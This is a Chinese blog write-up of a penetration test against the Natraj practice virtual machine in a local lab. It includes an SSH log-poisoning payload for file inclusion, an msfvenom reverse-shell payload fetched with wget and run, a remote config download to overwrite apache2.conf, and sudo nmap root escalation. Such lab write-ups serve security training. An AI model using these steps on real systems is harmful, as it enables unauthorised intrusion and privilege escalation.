Natraj靶场渗透测试

已于 2023-11-13 20:11:17 修改
阅读量135 收藏
点赞数
文章标签: 开发语言 网络安全 web安全
于 2023-11-13 20:10:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41567985/article/details/134385380
版权

项目概述

渗透测试目的

渗透测试范围

渗透测试时间

渗透测试环境

渗透测试人员

渗透测试方法

渗透测试流程

渗透测试方法与内容

渗透测试结果汇总

拿到关键信息key

本次渗透测试范围为本地,具体如下:

1-1:渗透测试对象

序号

系统名称

网站地址

内外网

1

      Natraj

http://192.168.21.43

内网

2023年11月13日 晚上18:00晚上19:00

在本地开展内网的vmware虚拟机中渗透测试。

TYR2

  • 信息收集
  • 主机存活扫描和端口扫描
  • 全面扫描

        

22、80开启

目录扫描

        

/console

        

/images

        

信息分析

    只有一个file.php文件可供利用-初步猜测是文件包含

  • 漏洞验证与利用
  • file.php文件包含漏洞验证
  • 输入?file=/etc/passwd测试,成功验证文件包含

        

  • 文件包含漏洞利用
  • 查看/etc/passwd发现两个普通用户

        

  • 日志本地文件包含利用

查看日志/vat/log/auth.log 发现记录了ssh登录历史

使用ssh test@192.168.21.39 测试-密码随便输入

使用curl查看该日志文件可以发现

        

用户名test被记录进入了该文件,那么我们可以猜测-把用户名写成一句话木马,应该也能被写入

格式:

        # 踩坑直接写入是不行的

        ssh <?php phpinfo();?>@IP

        # 带上双引号

        ssh '<?php phpinfo();?>'@IP

  • 使用蚁剑连接

        

  • 发现是www-data服务权限
  • 查看s权限文件

        

  • 使用kali生成木马文件-开启临时服务器

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.21.3 LPORT=9999 -f elf > mshell.elf

使用蚁剑进入tmp目录,使用wget命令下载mshell.elf文件,并赋予执行权限,执行mshell.elf文件

    进入msf开启监听

        

  • 进入shell-使用python优化shell(没有python就算了)

    使用find搜索s权限文件

    发现有个apache2.conf

        

    sudo -l

        

  • 把配置文件复制到本地修改后-打开python临时服务器远程下载替换

 # 目标机器到tmp目录下下载(有下载权限)

cd /tmp

# 下载

                wget http://192.168.45.179:80/apache2.conf

                # 给权限

                chmod +x apache2.conf

                # 覆盖

                cp apache2.conf /etc/apache2/apache2.conf

  • 无法使用sudo /bin/systemctl restart apache2
  • 直接重启靶场吧

还是使用之前一样的日志连接蚁剑,反弹shell

现在用户是mahakal了

        

sudo -l

     发现可以NOPASSWD执行namp

        

        

  • 直接使用nmap shell

        

然后在root目录下找到Flag.txt

        

Natraj靶场渗透测试主要通过文件包含,本地包含ssh登录日志,因为登录日志会记录错误的登录用户名,所以导致了一句话木马的写入

TYR2
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
拉吉拉曼
02-16
你好呀 :waving_hand: ,我是Natraj 我在Power Platform中工作 我原籍印度,但目前居住在澳大利亚墨尔本 :kangaroo: 。 我是典型印度人的刻板印象-我学习了非CS工程学,但是我目前在技术行业工作。 我最初是一名...
【打靶练习】vulnhub: Natraj
守拙的博客
07-23 224
Natraj靶机操作练习,文件包含、日志注入、apache配置提权、nmap提权
OSCP系列靶场-Esay-Ha-natraj
杳若的博客
08-06 3059
getwebshell → 目录扫描发现端点 → 发现文件读取 → 验证确认是文件包含 → 包含了ssh登录日志 → 反弹shell包含提 权 思 路 → 发现sudo级别的apache2服务 →apache2服务启动时修改其用户权限 → 重启apache2从目录权限提升到用户权限 →sudo-nmap权限提升。
vulnhub HA: Natraj
箭雨镜屋
06-30 1217
渗透思路:nmap扫描----dirb扫描网站目录----ffuf爆破url参数----利用auth.log和LFI获得反弹shell----修改/etc/apache2/apache2.conf获得mahakal的shell----sudo nmap提权
PG::Ha-natraj
aya3t的博客
11-25 603
PROVING GROUNDS::Ha-natraj
OSCP-1-3-natraj(本地文件包含、日志中毒、apache2配置漏洞、nmap提权)
墨痕诉清风的博客
06-30 192
像往常一样,我们将使用“Netdiscover”工具识别主机的 IP。所以,让我们首先用 nmap 列出所有 TCP 端口。我们从访问web服务(80端口)开始,在那里我们找到了几张关于Natraj的图片和信息,我们将查看源代码和robots.txt,似乎没有什么有用的。(或至少,目前)。因此,让我们继续进行。在 Dirb 及其默认字典的帮助下,我们找到了一个名为“”的目录。我们进入并列出一个名为“”的文件:如果我们执行它,我们会看到它什么也不做。我们可能需要添加其他内容。
kali渗透综合靶机(十一)--BSides-Vancouver靶机
W小哥
03-29 605
一、靶机下载 下载链接:https://pan.baidu.com/s/1s2ajnWHNVS_NZfnAjGpEvw 二、BSides-Vancouver靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.5 靶机IP:192.168.212.7...
【C++&Python&Java】字符处理详细解读_字符_ASCLL码_字母数字转换_算法竞赛_开发语言
YLCHUP的博客
07-15 2866
C++和Python和Java三语言超全讲解,详细辨析字符的妙用。让你熟练玩转“字符”这一数据类型。快来看ヾ(•ω•`)o
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全科普】勒索病毒 防护指南
最新发布
a38417的博客
07-20 672
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库中的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞。
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 961
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 590
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1165
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
2024年对网络安全专业的观点解析
goodxianping的专栏
07-17 521
网络安全专业的毕业生能够适应多个行业和岗位,包括但不限于政府部门、金融机构、大型互联网公司、电信运营商、科研机构的安全团队。学历较低、经验不足的大量初级从业人员与企业的需求不匹配,一方面找工作难,一方面企业招聘不到合适的安全人员,导致供需矛盾。在网络安全领域,学历并非衡量一个人能力的唯一标准,但普遍较低的学历水平确实反映了行业人才结构的某些问题。张雪峰对网络安全专业的看法是积极和乐观的。随着信息时代的到来,各类企业和组织对网络安全的需求越来越大,使得该专业的毕业生在市场上拥有很大的需求量。
网络安全----web安全防范
weixin_55357256的博客
07-16 663
以下代码用来防范流行的DDoS攻击,ARP欺骗,CC攻击,XXS攻击,对输入的恶意代码进行过滤,嵌入到web程序可以很好的防范网络攻击,但如果想要更好的防范网络攻击,还需要更加复杂的配置和更硬核的硬件。print(f"可能的 CC 攻击针对资源 {resource} 检测到")# 用于检测 CC 攻击的函数(简单示例,通过监测短时间内对同一资源的请求频率)# 用于检测 XSS 攻击的函数(简单示例,检查输入中是否存在可疑脚本标签)# 用于检测 DDoS 攻击的函数(简单示例,通过监测短时间内的连接数量)
网络安全-网络安全及其防护措施6
LS_Ai的博客
07-16 948
访问控制列表(ACL)是一种网络安全机制,用于控制网络设备上的数据包流量。通过ACL,可以定义允许或拒绝的流量,增强网络的安全性和管理效率。ACL通过在路由器或交换机上设置规则,确定哪些流量可以通过,哪些流量应该被阻止。入侵检测系统(IDS)定义:监控网络流量和系统活动,检测和记录潜在的安全威胁和攻击行为。IDS提供告警信息,但不主动阻止攻击。作用:检测并报警,但不干预攻击,主要用于识别潜在的安全问题和攻击模式。入侵防御系统(IPS)定义:在IDS的基础上,进一步采取措施阻止攻击行为,保护网络安全
网络安全】PostMessage:分析JS实现XSS
等风来
07-17 810
PostMessage是一个用于在网页间安全地发送消息的浏览器 API。它允许不同的窗口(例如,来自同一域名下的不同页面或者不同域名下的跨域页面)进行通信,而无需通过服务器。通常情况下,它用于实现跨文档消息传递(Cross-Document Messaging),这在一些复杂的网页应用和浏览器插件中非常有用。
网络安全-等级保护制度介绍
weixin_56233402的博客
07-18 425
以等级保护为标准开展安全建设,可以让单位自身安全建设更加体系化,可以从物理、网络、主机、应用、数据多个方面成体系进行安全建设,再也不会头疼医脚脚痛医头,对本单位的安全建设有了整体的规划和思路。责任更清晰,完成等保测评意味着公安机关认可你的安全现状,一旦发生安全事件是意外,如果没有进行等级保护测评意味着你没有达到国家要求,用户单位承担主要责任,网监部门会直接进行比较严厉的处罚。《信息系统安全保护等级定级指南》GB/T 22240-2008。《基本要求》《定级指南》《实施指南》《测评标准》
云计算监控减少网络安全事件的五种方法
QQ3007250950的博客
07-17 1078
没有充分保护自己的公司很容易受到网络攻击。如果他们使用云计算平台进行操作,这种风险就会增加。如果他们采取适当的安全措施来保护自己,那将是最好的。这些措施的一部分是实施云计算监控,这是一个允许网络安全专业人员主动检测云系统中的漏洞和可疑活动的过程。
网络安全(含面试题版)
weixin_65978343的博客
07-17 983
计算机网络覆盖的地理区域决定了它的类型。一般分为局域网(LAN)、城域网(MAN)、广域网(WAN)。 www:是环球信息网的缩写,(英文全称为“World Wide Web”),中文名字为“万维网”,"环球网"等,常简称为Web。 分为Web客户端和Web服务器程序。 IP地址 : 唯一标识网络上的每一台计算机 地址类用于指定网络 ID 并在网络 ID 和主机 ID 之间提供分隔方法 IANA(互联网数字分配机构)是负责协调一些使Internet正常

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值